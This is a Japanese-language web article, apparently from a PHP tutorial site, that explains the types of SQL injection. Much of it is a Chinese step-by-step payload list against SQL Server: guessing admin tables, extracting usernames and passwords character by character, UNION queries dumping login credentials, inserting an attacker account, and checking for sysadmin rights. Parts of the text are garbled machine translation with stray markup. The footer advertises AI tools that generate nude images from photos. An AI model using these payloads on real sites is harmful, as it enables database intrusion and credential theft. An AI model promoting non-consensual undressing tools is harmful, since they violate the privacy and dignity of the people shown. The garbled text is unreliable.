SQLインジェクションステートメントとは何ですか?
SQL インジェクション ステートメントには 3 つのタイプがあります: 1. 数値インジェクション ポイント (「id=1 および 1=1 のテーブル名から選択 *」など); 2. 文字インジェクション ポイント (次のようなステートメント) 「 select * from table name where name...」などのステートメント; 3. インジェクションポイントを検索します。
この記事の動作環境: Windows 7 システム、SQL Server 2016 バージョン、Dell G3 コンピューター。
一般的な SQL インジェクション ステートメント
SQL インジェクション
1. SQL インジェクションとは
SQL コマンドを Web フォームに挿入するまたは、ドメイン名またはページリクエストのクエリ文字列を入力し、最終的にサーバーをだまして悪意のある SQL コマンドを実行させます。
2. SQL インジェクション タイプ
インジェクション ポイントのタイプによる分類
(1) 数値インジェクション ポイント
多くの Web リンクは、同様の構造 http を持っています。 //xxx.com/users.php?id=1 このフォームに基づくインジェクションは、インジェクション ポイント ID タイプが数値であるため、一般にデジタル インジェクション ポイントと呼ばれます。ユーザーの個人情報の表示、記事の表示など、ほとんどの Web ページでなど、ほとんどの場合、この形式の構造を使用して ID などの情報を転送し、それをバックエンドに渡し、データベース内の対応する情報を照会してフロントデスクに返します。このタイプの SQL ステートメントのプロトタイプはおそらく select * from table name where id=1
です。インジェクションがある場合は、ブラスト用に次のような SQL インジェクション ステートメントを構築できます。 select * fromテーブル名 (id=1 および 1=1)
select * from table name where name='admin' です。数値注入タイプの SQL ステートメントのプロトタイプと比較して、より多くの引用符があることに注意してください。一重引用符、または二重引用符。インジェクションがある場合は、次のような SQL インジェクション ステートメントを構築して爆発させることができます:
select * from table name where name='admin' and 1=1 ' これらの煩わしい引用符を取り除く必要があります。マークが付いています。
"keyword=keywords" が含まれます。一部はリンク アドレスには表示されず、検索ボックス、フォームの送信。このタイプの注入ポイントによって送信される SQL ステートメントのプロトタイプは、大まかに次のとおりです。
select * from table name where field like '%keyword%' インジェクションがある場合は、次のような SQL インジェクション ステートメントを構築できます。展開:
select * from table name where field like '%test%' and '%1%'='%1%'
次の方法に従って分類します。データ送信(1) GET インジェクションデータの送信方法は GET で、インジェクション ポイントの場所は GET パラメーター セクションにあります。たとえば、http://xxx.com/news.php?id=1 というリンクがあります。id は注入ポイントです。 (2) POST インジェクションPOST メソッドを使用してデータを送信します。インジェクション ポイントは、フォーム内でよく発生する POST データ部分にあります。 (3) Cookie インジェクションHTTP リクエストはクライアントの Cookie を取得します。インジェクション ポイントは Cookie 内の特定のフィールドに存在します。 (4) HTTP ヘッダー インジェクションインジェクション ポイントは、HTTP リクエスト ヘッダーの特定のフィールドにあります。たとえば、これは [User-Agent] フィールドに存在します。厳密に言うと、Cookie は実際にはヘッダー インジェクションの一種と考えるべきです。 HTTP リクエスト中、Cookie はヘッダー内のフィールドであるためです。
実行効果による分類(1) Booleanベースのブラインドインジェクションは、条件の真偽を判定できるインジェクションです。返されたページに基づいて。 (2) 時間ベースのブラインド インジェクションつまり、ページから返されたコンテンツに基づいて情報を判断することはできません。条件文を使用して、時間遅延ステートメントが正しいかどうかを確認できます。実行されるかどうか (つまり、ページの戻り時間が増加するかどうか)。 (3) エラー報告に基づく挿入つまり、ページはエラー情報を返すか、挿入されたステートメントの結果がページに直接返されます。
- 一重引用符
- 二重引用符
- 数値インジェクションに基づく
1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0<>(select count(*) from *) and 0<>(select count(*) from admin) ---判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 and 0<(select count(*) from admin) and 1<(select count(*) from admin) 4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. and 1=(select count(*) from admin where len(*)>0)-- and 1=(select count(*) from admin where len(用户字段名称name)>0) and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0) 5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 and 1=(select count(*) from admin where len(*)>0) and 1=(select count(*) from admin where len(name)>6) 错误 and 1=(select count(*) from admin where len(name)>5) 正确 长度是6 and 1=(select count(*) from admin where len(name)=6) 正确 and 1=(select count(*) from admin where len(password)>11) 正确 and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 and 1=(select count(*) from admin where len(password)=12) 正确 6.猜解字符 and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- 这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符. group by users.id having 1=1-- group by users.id, users.username, users.password, users.privs having 1=1-- ; insert into users values( 666, attacker, foobar, 0xffff )-- UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS WHERE TABLE_blank>_NAME=logintable- UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank >_id)- UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank >_id,login_blank>_name)- UNION SELECT TOP 1 login_blank>_name FROM logintable- UNION SELECT TOP 1 password FROM logintable where login_blank>_name=Rahul-- 看_blank>服务器打的补丁=出错了打了SP4补丁 and 1=(select @@VERSION)-- 看_blank>数据库连接账号的权限,返回正常,证明是_blank>服务器角色sysadmin权限。 and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin))-- 判断连接_blank>数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA) and sa=(SELECT System_blank>_user)-- and user_blank>_name()=dbo-- and 0<>(select user_blank>_name()--
以上がSQLインジェクションステートメントとは何ですか?の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

ホットAIツール

Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。

Undress AI Tool
脱衣画像を無料で

Clothoff.io
AI衣類リムーバー

AI Hentai Generator
AIヘンタイを無料で生成します。

人気の記事

ホットツール

メモ帳++7.3.1
使いやすく無料のコードエディター

SublimeText3 中国語版
中国語版、とても使いやすい

ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境

ドリームウィーバー CS6
ビジュアル Web 開発ツール

SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)

ホットトピック

HQL と SQL は Hibernate フレームワークで比較されます。HQL (1. オブジェクト指向構文、2. データベースに依存しないクエリ、3. タイプ セーフティ)、SQL はデータベースを直接操作します (1. データベースに依存しない標準、2. 複雑な実行可能ファイル)。クエリとデータ操作)。

「OracleSQLでの除算演算の使用方法」 OracleSQLでは、除算演算は一般的な数学演算の1つです。データのクエリと処理中に、除算演算はフィールド間の比率を計算したり、特定の値間の論理関係を導出したりするのに役立ちます。この記事では、OracleSQL での除算演算の使用法を紹介し、具体的なコード例を示します。 1. OracleSQL における除算演算の 2 つの方法 OracleSQL では、除算演算を 2 つの異なる方法で実行できます。

Oracle と DB2 は一般的に使用される 2 つのリレーショナル データベース管理システムであり、それぞれに独自の SQL 構文と特性があります。この記事では、Oracle と DB2 の SQL 構文を比較し、相違点を示し、具体的なコード例を示します。データベース接続 Oracle では、次のステートメントを使用してデータベースに接続します: CONNECTusername/password@database DB2 では、データベースに接続するステートメントは次のとおりです: CONNECTTOdataba

SQL における Identity とは何ですか? 具体的なコード例が必要です。SQL では、Identity は自動インクリメント数値の生成に使用される特別なデータ型です。多くの場合、テーブル内のデータの各行を一意に識別するために使用されます。 Identity 列は、各レコードが一意の識別子を持つようにするために、主キー列と組み合わせてよく使用されます。この記事では、Identity の使用方法といくつかの実用的なコード例について詳しく説明します。 Identity の基本的な使用方法は、テーブルを作成するときに Identity を使用することです。

MyBatis 動的 SQL タグの解釈: Set タグの使用法の詳細な説明 MyBatis は、豊富な動的 SQL タグを提供し、データベース操作ステートメントを柔軟に構築できる優れた永続層フレームワークです。このうち、Set タグは、UPDATE ステートメントで SET 句を生成するために使用され、更新操作でよく使用されます。この記事では、MyBatis での Set タグの使用法を詳細に説明し、特定のコード例を通じてその機能を示します。 SetタグとはMyBatiで使用するSetタグです。

背景: 企業のニーズの 1 つは、企業の既存のリンク トラッキング ログ コンポーネントが MySQL の SQL 実行時間の出力をサポートする必要があるということです。リンク トラッキングを実装する一般的な方法は、サードパーティのフレームワークまたはツールによって提供されるインターセプタ インターフェイスまたはフィルタ インターフェイスを実装することです。 MySQL も例外ではなく、実際には、MySQL によって駆動されるインターセプタ インターフェイスを実装しているだけです。 MySQL チャネルにはさまざまなバージョンがあり、バージョンごとにインターセプタ インターフェイスが異なるため、使用する MySQL ドライバのバージョンに応じて応答インターセプタを実装する必要があります。次に、MySQL チャネル 5 と 6 をそれぞれ紹介します8。バージョンの実装。ここでは、Statem を実装する例として MySQL チャネル 5.1.18 バージョンを使用して MySQL5 を実装します。

解決策: 1. ログインしているユーザーがデータベースにアクセスまたは操作するための十分な権限を持っているかどうかを確認し、ユーザーが正しい権限を持っているかどうかを確認します; 2. SQL Server サービスのアカウントに指定されたファイルまたはデータベースにアクセスする権限があるかどうかを確認します。 3. 指定されたデータベース ファイルが他のプロセスによって開かれているかロックされているかどうかを確認し、ファイルを閉じるか解放して、クエリを再実行します。管理者として試してください。Management Studio をなどとして実行します。

Springboot+Mybatis-plus が SQL ステートメントを使用して複数テーブルの追加操作を実行しない場合、私が遭遇した問題は、テスト環境で思考をシミュレートすることによって分解されます: パラメーターを含む BrandDTO オブジェクトを作成し、パラメーターをバックグラウンドに渡すことをシミュレートします。 Mybatis-plus で複数テーブルの操作を実行するのは非常に難しいことを理解してください。Mybatis-plus-join などのツールを使用しない場合は、対応する Mapper.xml ファイルを設定し、臭くて長い ResultMap を設定するだけです。対応する SQL ステートメントを記述します。この方法は面倒に見えますが、柔軟性が高く、次のことが可能です。
